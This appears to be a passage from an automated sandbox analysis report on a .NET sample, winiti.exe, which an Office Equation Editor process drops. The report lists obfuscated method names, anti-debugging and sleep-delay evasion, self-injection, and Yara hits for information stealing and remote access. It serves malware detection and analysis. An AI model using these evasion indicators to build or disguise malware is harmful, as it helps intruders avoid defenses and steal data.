Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs High entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, QpyfwtBfq1mip1rA69.cs High entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, iIG0lTjpxEHhOQvkFer.cs High entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, g3uWXYxFNrFgfAVMbg.cs High entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, SM8r4X8fVbB7QJOWqS.cs High entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, raIl7X21rhHoQ1rmtr.cs High entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, lcS7RE1vxlKWGpOeGp.cs High entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, xFiqCjOS4mObwnqG7R.cs High entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, Y56XpTEtPmCWtAUcx3.cs High entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, LQj0kcVZN6Kkvud9DR.cs High entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, bwrRjVyKj1VL5wCXv7.cs High entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, H5DbcuXYjlGQPm0xJ0.cs High entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, IcQdK2rXYfyvqYcyHa.cs High entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, QoOP4PjGKS5gfhE57SM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, qKgcIJaPN5xDIttQpD.cs High entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, hNFj00Hv45CTOkfqEI.cs High entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, Q8PlVd7gMYjm0S8vYt.cs High entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, OOABLIblxanx4dA8KG.cs High entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, f3eVc2kPtPvNgZNKDL.cs High entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, XC3FVVqBJrFXgahDpX.cs High entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\winiti.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 2510000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 3E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 7EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 5420000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 8EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 5720000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DD0101 rdtsc 6_2_00DD0101
Source: C:\Users\user\AppData\Roaming\winiti.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3144 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3196 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3288 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DD0101 rdtsc 6_2_00DD0101
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00417A03 LdrLoadDll, 6_2_00417A03
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D700EA mov eax, dword ptr fs:[00000030h] 6_2_00D700EA
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D70080 mov ecx, dword ptr fs:[00000030h] 6_2_00D70080
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D926F8 mov eax, dword ptr fs:[00000030h] 6_2_00D926F8
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Users\user\AppData\Roaming\winiti.exe Queries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.winiti.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.winiti.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY